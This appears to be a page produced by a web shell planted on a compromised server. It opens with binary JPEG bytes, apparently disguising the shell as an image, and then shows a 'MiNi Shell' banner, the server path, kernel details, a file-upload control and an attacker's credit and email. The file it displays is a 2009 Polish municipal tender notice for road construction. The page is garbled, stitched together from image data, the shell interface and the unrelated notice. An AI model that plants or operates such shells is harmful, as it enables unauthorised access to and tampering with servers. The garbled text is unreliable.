JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090129/30945-N-2009.html

<p class="kh_header"><b>Janowiec Wielkopolski: Utworzenie ciągu komunikacyjnego z infrastrukturą towarzyszącą łączącego drogi powiatowe - ul. 1000-lecia z ul. Bielawską w Janowcu Wielkopolskim</b><br>
<b>Numer ogłoszenia: 30945 - 2009; data zamieszczenia: 29.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Janowiec Wielkopolski , ul. Gnieźnieńska 3, 88-430 Janowiec Wielkopolski, woj. kujawsko-pomorskie, tel. 052 3023034, faks 052 3023020.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie ciągu komunikacyjnego z infrastrukturą towarzyszącą łączącego drogi powiatowe - ul. 1000-lecia z ul. Bielawską w Janowcu Wielkopolskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest budowa ciągu komunikacyjnego z infrastrukturą towarzyszącą
łączącego dwie drogi powiatowe - ul. 1000-lecia z ul. Bielawską - w Janowcu Wielkopolskim obejmujące w szczególności  wykonanie :


     1)   jezdni  szerokości  6,00m - dł. 1.495,0 mb ( ciąg od ul. Bielawskiej do ul. 1000-lecia)  z warstwy  
ścieralnej h=4 cm i wiążącej h=7 cm na podbudowie z tłucznia twardego ,
 ściek przykrawężnikowy z dwóch kostek 8x10x20 cegiełka na płask i  jedna kostka 8x10x20 na rąb; 
 z chodnikiem dla pieszych - szerokość 1,50 m  i 2,00 m- pow.  3.556,0  m2  z kostki betonowej h=6 cm na podsypce piaskowej;     wjazdów na posesje indywidualne w chodniku  - pow. 641,9 m2 z kostki betonowej  8x10x20 h=8cm  czerwonej, na podsypce  cementowo-piaskowej;

                    2)  nawierzchni parkingu wzdłużnego przy cmentarzu - zatoki   parkingowej  wzdłuż jezdni z poz. 1 -    szerokości 2,00 m - pow. 297,0 m2  z kostki betonowej h=8 cm na podsypce cementowo-piskowej;
                       
     3)  nawierzchni parkingu /między drzewami/  o pow. 558,0 m2  z kostki betonowej h=8 cm na podsypce piaskowej i podbudowie z tłucznia twardego;       
                               
 4)  małego ronda - jezdnia- szerokości  5,50 m o nawierzchni z warstwy ścieralnej h=4 cm i wiążącej h=7 cm na podbudowie z kruszywa twardego, pierścień najazdowy i pierścienie boczne najazdowe na rondo - szer. 3,0 m,  z kostki betonowej czerwonej h=8 cm na podsypce cementowo-piaskowej, wyspy dzielące na wlotach ronda z kostki betonowej czerwonej h=8 cm na podsypce cementowo-pisakowej;

    5)   jezdni za rondem - szerokości 6,0 m długości 134,0 mb  ( warstwa ścieralna h=4 cm i wiążąca  h=7  cm, na podbudowie z tłucznia twardego); z chodnikiem dla pieszych - pow. 350,0 m2  z kostki betonowej h=6 cm na podsypce piaskowej;  wjazdy na posesje w chodniku - pow. 321,5 m2  z kostki betonowej (czerwona) h=8 cm na podsypce cementowo-piaskowej;

    6) Plac do zawracania ulicy  za rondem - pow.  416 m2  z kostki betonowej EKO h=8 cm na podsypce piaskowej; 

   7)  Urządzenia bezpieczeństwa ruchu drogowego:
       -  Znaki drogowe:  z grupy znaków S - średnie folia odblaskowa typu 2- łącznie 106 sztuk.              
        - Oznakowanie poziome: 
              malowanie linii segregacyjnych: - Linia P-13  59m, Linia P-4  73m, Linia P-14  3m, Linia P-1d  71m; 
              malowanie pasów; - Pasy P-10   240m2, Linia P-21  20m2;                          

   8)   Przebudowa przepustu na Strudze Bielawskiej  z rur wipro o śr. 1200 mm  l = 12,5m   z wykonaniem  barieroporęczy  U-11b o długości 2x12,00m. Na rowie RBJ w Bielawach zaprojektowano ustawienie bariery energochłonnej SP- obustronnie z końcówkami kulistymi o dł. 2x16,0 m oraz jednostronnie na łuku ul. Polnej i Południowej 1x10,0 m;

   9)  usunięcie kolizji - przebudowa linii telekomunikacyjnych i energetycznych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9, 45.23.14.00-9, 45.23.23.10-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się  wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych i nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 w/w ustawy oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia.

2. Zgodnie z art. 22 ust. 1 Ustawy pzp, o udzielenie Zamówienia mogą ubiegać się Wykonawcy,  którzy:

      2.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  ustawy
                 nakładają obowiązek posiadania takich uprawnień;  

      2.2.  posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym i  osobami zdolnymi do wy?konania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;

      2.3  znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie  zamówienia;   
    
 2.4   nie podlegają wykluczeniu z postępowania, zgodnie z art. 24 ust. 1 i 2 Ustawy pzp.

3. Posiadają niezbędna wiedzę i doświadczenie do wykonywania zamówienia, potwierdzone wykonaniem w ostatnich 5 latach przed dniem wszczęcia postępowania, tj. przed terminem zamieszczenia ogłoszenia o zamówieniu,  co najmniej  2 robót  budowlanych w zakresie  wykonania remontu, budowy lub przebudowy dróg tj. wykonanie nawierzchni asfaltowej  o  powierzchni  każda co najmniej   8.000,0 m2.

4.   Dysponują osobami zdolnymi do wykonania zamówienia  tj. -  wskazany kierownik budowy posiada doświadczenie zawodowe co najmniej 3 lata na stanowisku kierownika budowy  legitymujący się 

        - uprawnieniami  w specjalności  drogowej - wymaganymi przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zm. ) 
  
        -  aktualnym zaświadczeniem o wpisie na listę właściwej Okręgowej Izby Inżynierów Budownictwa .

5. Wykonawca winien udzielić gwarancji jakości na wykonane zamówienie na okres co najmniej 36 
      miesięcy licząc od dnia odbioru końcowego;

 6. Zamawiający oceni spełnienie  w/w warunków udziału w postępowaniu na  podstawie  złożonego oświadczenia  według formularza  nr 2 i 2A oraz dokumentów określonych w rozdziale 6 specyfikacji. Ocena spełniania warunków zostanie dokonana na podstawie przedstawionych dokumentów wg formuły    spełnia - nie spełnia;.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca do oferty sporządzonej według formularza nr 1 zobowiązany jest przedłożyć  oświadczenie według formularza nr 2 i 2A o spełnieniu warunków udziału w   postępowaniu o udzielenie zamówienia publicznego oraz poniższe dokumenty.

2. Pełnomocnictwo złożone w formie oryginału  do reprezentowania wykonawcy - o ile ofertę składa pełnomocnik. 









  3. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy pzp - zamawiający żąda od wykonawcy przedłożenia;

     3.1. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 

    3.2. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego odpowiednio, że wykonawca nie zalega z opłacaniem podatków,  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawionych nie wcześniej niż  3 miesiące przed upływem terminu składania ofert.

    3.3.  aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego odpowiednio, że wykonawca nie zalega z opłacaniem  opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawionych nie wcześniej niż  3 miesiące przed upływem terminu składania ofert.

 4. W celu potwierdzenia opisanego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz  dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - zamawiający żąda od wykonawcy przedłożenia:

      4.1. wykazu wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, tj. przed terminem publikacji ogłoszenia o zamówieniu; a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania - według formularza nr 3 oraz załączeniem dokumentów ( np. referencje, protokoł odbioru końcowego robót) potwierdzających, że roboty budowlane przedstawione w wykazie zostały wykonane należycie.

      4.2. wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - według  formularza nr 4 z przedłożeniem dla kierownika robót budowlanych: 
                   -   uprawnień budowlanych do kierowania robotami budowlanymi  w specjalności  drogowej     
                   -  aktualne zaświadczenia o wpisie na listę właściwej Okręgowej Izby Inżynierów 
                        Budownictwa

4.3. pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie według formularza nr 4, wykonawca wskazał osoby, którymi będzie dysponował;

5. Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej składają dokumenty zgodnie z przepisami rozporządzenia   Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonania, oraz form, w jakich te dokumenty mogą być składane ( Dz. U. Nr 87, poz. 605) z uwzględnieniem zmian wprowadzonych rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniającym rozporządzenia w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane ( Dz. U. Nr 188, poz. 1155)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.janowiec.wlkp.bip.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Janowcu Wielkopolskim; ul. Gnieźnieńska 3; 88-430  Janowiec Wielkopolski - pokój nr 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2009 godzina 10:00, miejsce: siedziba zamawiającego :Urząd Miejski w Janowcu Wielkopolski ul. Gnieźnieńska 3 - sekretariat - pokój nr 6.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com